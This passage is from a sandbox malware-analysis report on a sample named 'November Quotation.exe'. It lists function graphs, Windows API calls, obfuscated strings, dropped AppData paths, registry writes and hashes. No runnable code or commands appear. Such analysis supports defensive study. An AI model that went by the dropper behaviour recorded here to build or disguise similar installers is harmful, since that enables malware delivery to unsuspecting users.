                                                                                                                • Part of subcall function 0040504B: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                                                                • Part of subcall function 0040504B: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID: %flechettes%\slaggerne\grudgingness$C:\Program Files (x86)\Common Files\actionizing.mon$C:\Users\user\AppData\Local\sognenes\iconograph\Folkways$reformandum\desperations\
                                                                                                              • API String ID: 1941528284-997283279
                                                                                                              • Opcode ID: a136ea5669a7d7d0161c1cd16082336334043ff9ed154f659fcf1137da06a460
                                                                                                              • Instruction ID: e0c9a0707421b0566b50a086881e387c24033da95965c7c775ca149cf8f14c82
                                                                                                              • Opcode Fuzzy Hash: a136ea5669a7d7d0161c1cd16082336334043ff9ed154f659fcf1137da06a460
                                                                                                              • Instruction Fuzzy Hash: EA418071900518BACF116BB5DC4ADAF7679EF45368B20823BF421B10E1D73C8A519A6D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 536 402fa0-402fb9 537 402fc2-402fca 536->537 538 402fbb 536->538 539 402fd3-402fd8 537->539 540 402fcc 537->540 538->537 541 402fe8-402ff5 call 4031c8 539->541 542 402fda-402fe3 call 4031de 539->542 540->539 546 403175 541->546 547 402ffb-402fff 541->547 542->541 550 403177-403178 546->550 548 403005-40304c GetTickCount 547->548 549 40315e-403160 547->549 553 403052-40305a 548->553 554 4031be 548->554 551 403162-403165 549->551 552 4031b4-4031b7 549->552 555 4031c1-4031c5 550->555 558 403167 551->558 559 40316a-403173 call 4031c8 551->559 556 4031b9 552->556 557 40317a-403180 552->557 560 40305c 553->560 561 40305f-40306d call 4031c8 553->561 554->555 556->554 564 403182 557->564 565 403185-403193 call 4031c8 557->565 558->559 559->546 569 4031bb 559->569 560->561 561->546 570 403073-40307c 561->570 564->565 565->546 573 403195-4031a7 WriteFile 565->573 569->554 572 403082-4030a2 call 406227 570->572 579 403156-403158 572->579 580 4030a8-4030bb GetTickCount 572->580 575 4031a9-4031ac 573->575 576 40315a-40315c 573->576 575->576 578 4031ae-4031b1 575->578 576->550 578->552 579->550 581 403106-40310a 580->581 582 4030bd-4030c5 580->582 585 40314b-40314e 581->585 586 40310c-40310f 581->586 583 4030c7-4030cb 582->583 584 4030cd-4030fe MulDiv wsprintfW call 40504b 582->584 583->581 583->584 591 403103 584->591 585->553 590 403154 585->590 588 403131-40313c 586->588 589 403111-403125 WriteFile 586->589 593 40313f-403143 588->593 589->576 592 403127-40312a 589->592 590->554 591->581 592->576 594 40312c-40312f 592->594 593->572 595 403149 593->595 594->593 595->554
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 0040300B
                                                                                                              • GetTickCount.KERNEL32 ref: 004030B0
                                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004030D9
                                                                                                              • wsprintfW.USER32 ref: 004030EC
                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,0041AB9A,00402F3A,00000000), ref: 0040311D
                                                                                                              Strings
                                                                                                              • studious ambulacra burdon fjernseer overrkkelsen ludderkarle livingly.scientificogeographical hypotaktiskes ecclesioclastic biestings stormoguler,arvebeholdningens nedskrivningstidspunkt delebrnenes opmarchfelts bemingles,nasalized unquittable efterrationalise, xrefs: 00403017
                                                                                                              • ... %d%%, xrefs: 004030E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountTick$FileWritewsprintf
                                                                                                              • String ID: ... %d%%$studious ambulacra burdon fjernseer overrkkelsen ludderkarle livingly.scientificogeographical hypotaktiskes ecclesioclastic biestings stormoguler,arvebeholdningens nedskrivningstidspunkt delebrnenes opmarchfelts bemingles,nasalized unquittable efterrationalise
                                                                                                              • API String ID: 4209647438-1157943194
                                                                                                              • Opcode ID: 567d16c84bc26e35b56de6a991f7c1d851492a15168b7d80d9f2dbebfc4257a8
                                                                                                              • Instruction ID: edebebcb9cc5efd3ffb8aa1a5e3cca2c022cdf8913c1b450003ecc800609919e
                                                                                                              • Opcode Fuzzy Hash: 567d16c84bc26e35b56de6a991f7c1d851492a15168b7d80d9f2dbebfc4257a8
                                                                                                              • Instruction Fuzzy Hash: 78615971900219EBCF10DF65DA84A9F7FB8AF08312F14457BE814BB2D0D7789A50CBA9

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 596 40504b-405060 597 405066-405077 596->597 598 405117-40511b 596->598 599 405082-40508e lstrlenW 597->599 600 405079-40507d call 405dc3 597->600 602 405090-4050a0 lstrlenW 599->602 603 4050ab-4050af 599->603 600->599 602->598 606 4050a2-4050a6 lstrcatW 602->606 604 4050b1-4050b8 SetWindowTextW 603->604 605 4050be-4050c2 603->605 604->605 607 4050c4-405106 SendMessageW * 3 605->607 608 405108-40510a 605->608 606->603 607->608 608->598 609 40510c-40510f 608->609 609->598
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(Completed,00000000,0041AB9A,76F923A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                                                              • lstrlenW.KERNEL32(00403103,Completed,00000000,0041AB9A,76F923A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                                                              • lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041AB9A,76F923A0), ref: 004050A6
                                                                                                              • SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID: Completed
                                                                                                              • API String ID: 2531174081-3087654605
                                                                                                              • Opcode ID: de5bbd2ec47a5afdc2151420ab1ec2db132e359724651f026e52d768b98c2cc9
                                                                                                              • Instruction ID: 18f0b212c8a37fbfd9ea408b4b1fd2a272b642164fc692df639cd20d24458be7
                                                                                                              • Opcode Fuzzy Hash: de5bbd2ec47a5afdc2151420ab1ec2db132e359724651f026e52d768b98c2cc9
                                                                                                              • Instruction Fuzzy Hash: 56219D71900518BADB11AF95DD85EDFBFB9EF84314F10807AF904B62A1C3794A40CFA8

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 610 40232f-402375 call 402c2d call 402b38 * 2 RegCreateKeyExW 617 4029c5-4029d4 610->617 618 40237b-402383 610->618 620 402385-402392 call 402b38 lstrlenW 618->620 621 402396-402399 618->621 620->621 624 4023a9-4023ac 621->624 625 40239b-4023a8 call 402b1b 621->625 627 4023bd-4023d1 RegSetValueExW 624->627 628 4023ae-4023b8 call 402fa0 624->628 625->624 632 4023d3 627->632 633 4023d6-4024b0 RegCloseKey 627->633 628->627 632->633 633->617 635 402791-402798 633->635 635->617
                                                                                                              APIs
                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                                                                              • lstrlenW.KERNEL32(reformandum\desperations\,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,reformandum\desperations\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,reformandum\desperations\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                              • String ID: reformandum\desperations\
                                                                                                              • API String ID: 1356686001-382907919
                                                                                                              • Opcode ID: 6dafd1b7ebf10da7ce8aef022b596c409f8f15a14c1dbf3a6d76a009c85efe50
                                                                                                              • Instruction ID: 92be6db62a7debd6b64078ffb9939270950072c0cf2fb5a53bae11f9be139373
                                                                                                              • Opcode Fuzzy Hash: 6dafd1b7ebf10da7ce8aef022b596c409f8f15a14c1dbf3a6d76a009c85efe50
                                                                                                              • Instruction Fuzzy Hash: 8F1190B1A00108BFEB00AFA1DE8AEAF777CEB54358F11403AF504B71D0D7B85D409A68

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 636 4015b9-4015cd call 402b38 call 405897 641 401614-401617 636->641 642 4015cf-4015eb call 405819 CreateDirectoryW 636->642 643 401646-402195 call 401423 641->643 644 401619-401638 call 401423 call 405da1 SetCurrentDirectoryW 641->644 651 40160a-401612 642->651 652 4015ed-4015f8 GetLastError 642->652 657 402791-402798 643->657 658 4029c5-4029d4 643->658 644->658 661 40163e-401641 644->661 651->641 651->642 655 401607 652->655 656 4015fa-401605 GetFileAttributesW 652->656 655->651 656->651 656->655 657->658 661->658
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405897: CharNextW.USER32(?,?,0042FA00,?,0040590B,0042FA00,0042FA00,?,?,76F93420,00405649,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\November Quotation.exe"), ref: 004058A5
                                                                                                                • Part of subcall function 00405897: CharNextW.USER32(00000000), ref: 004058AA
                                                                                                                • Part of subcall function 00405897: CharNextW.USER32(00000000), ref: 004058C2
                                                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\sognenes\iconograph\Folkways,?,00000000,000000F0), ref: 00401630
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\sognenes\iconograph\Folkways, xrefs: 00401623
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                              • String ID: C:\Users\user\AppData\Local\sognenes\iconograph\Folkways
                                                                                                              • API String ID: 3751793516-2186690595
                                                                                                              • Opcode ID: 109ac3cab168821cff9c761a4bcdab396d1ff7e1addeaf9cefa6065999dfc9c4
                                                                                                              • Instruction ID: 34d8f352ef9aa8656828f895e526d2bd4293bf172d5861d5c75f43cad8b5630e
                                                                                                              • Opcode Fuzzy Hash: 109ac3cab168821cff9c761a4bcdab396d1ff7e1addeaf9cefa6065999dfc9c4
                                                                                                              • Instruction Fuzzy Hash: B2112531500104EBCF206FA0DD449AE3BB0EF05369B29453BF881F22E0D73D49808B5D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 663 401bca-401be2 call 402b1b * 2 668 401be4-401beb call 402b38 663->668 669 401bee-401bf2 663->669 668->669 670 401bf4-401bfb call 402b38 669->670 671 401bfe-401c04 669->671 670->671 674 401c06-401c1a call 402b1b * 2 671->674 675 401c4a-401c74 call 402b38 * 2 FindWindowExW 671->675 687 401c3a-401c48 SendMessageW 674->687 688 401c1c-401c38 SendMessageTimeoutW 674->688 686 401c7a 675->686 689 401c7d-401c80 686->689 687->686 688->689 690 4029c5-4029d4 689->690 691 401c86 689->691 691->690
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: fa0622c80f3ea4c4a1a4fe4c6f91de5de270cf664640931bdd5eb32ff74c1ad7
                                                                                                              • Instruction ID: d25c1399015d6fc3d8f93c2dcf78642a10d85d9054307dbf3bdfe5c686c79543
                                                                                                              • Opcode Fuzzy Hash: fa0622c80f3ea4c4a1a4fe4c6f91de5de270cf664640931bdd5eb32ff74c1ad7
                                                                                                              • Instruction Fuzzy Hash: FC21B371A44208AFEF01AFB0CA4AEAD7B75EF45308F10413EF502B61D1D7B8A941DB18

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 694 405c6e-405ca0 RegOpenKeyExW 695 405ce2-405ce5 694->695 696 405ca2-405cc1 RegQueryValueExW 694->696 697 405cc3-405cc7 696->697 698 405ccf 696->698 699 405cd2-405cdc RegCloseKey 697->699 700 405cc9-405ccd 697->700 698->699 699->695 700->698 700->699
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00405EE1,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C98
                                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405EE1,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405CB9
                                                                                                              • RegCloseKey.KERNELBASE(?,?,00405EE1,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405CDC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                              • String ID: : Completed
                                                                                                              • API String ID: 3677997916-2954849223
                                                                                                              • Opcode ID: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                                                              • Instruction ID: 1d06ac5ea4b77b92fe9c69a11a88cf34e34d0d3ad3680f8f47b16bffbdb95091
                                                                                                              • Opcode Fuzzy Hash: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                                                              • Instruction Fuzzy Hash: AE01483115060AAADB218F16ED08E9B3BA8FF44350F01402AF945D2260D734D964DFA9

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 701 405a3c-405a48 702 405a49-405a7d GetTickCount GetTempFileNameW 701->702 703 405a8c-405a8e 702->703 704 405a7f-405a81 702->704 706 405a86-405a89 703->706 704->702 705 405a83 704->705 705->706
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00405A5A
                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403227,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A75
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                              • API String ID: 1716503409-2113348990
                                                                                                              • Opcode ID: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                                                              • Instruction ID: 485616ab74b01dad4b6f2028e8278cd76642f71c5b474b9ae6064b4a8122c260
                                                                                                              • Opcode Fuzzy Hash: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                                                              • Instruction Fuzzy Hash: 76F03076700204BFDB008F59DD45FAFB7A8EB95750F10803AEE45E7290E6B09A548F64

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 707 401e51-401e62 call 402b38 call 40504b call 40551c 713 401e67-401e6c 707->713 714 402791-402798 713->714 715 401e72-401e75 713->715 716 4029c5-4029d4 714->716 717 401ec6-401ecf CloseHandle 715->717 718 401e77-401e87 WaitForSingleObject 715->718 717->716 720 401e97-401e99 718->720 722 401e89-401e95 call 406144 WaitForSingleObject 720->722 723 401e9b-401eab GetExitCodeProcess 720->723 722->720 725 401eba-401ebd 723->725 726 401ead-401eb8 call 405ce8 723->726 725->717 729 401ebf 725->729 726->717 729->717
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040504B: lstrlenW.KERNEL32(Completed,00000000,0041AB9A,76F923A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                                                                • Part of subcall function 0040504B: lstrlenW.KERNEL32(00403103,Completed,00000000,0041AB9A,76F923A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                                                                • Part of subcall function 0040504B: lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041AB9A,76F923A0), ref: 004050A6
                                                                                                                • Part of subcall function 0040504B: SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                                                                • Part of subcall function 0040504B: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
                                                                                                                • Part of subcall function 0040504B: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                                                                • Part of subcall function 0040504B: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                                                                • Part of subcall function 0040551C: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 00405541
                                                                                                                • Part of subcall function 0040551C: CloseHandle.KERNEL32(?), ref: 0040554E
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
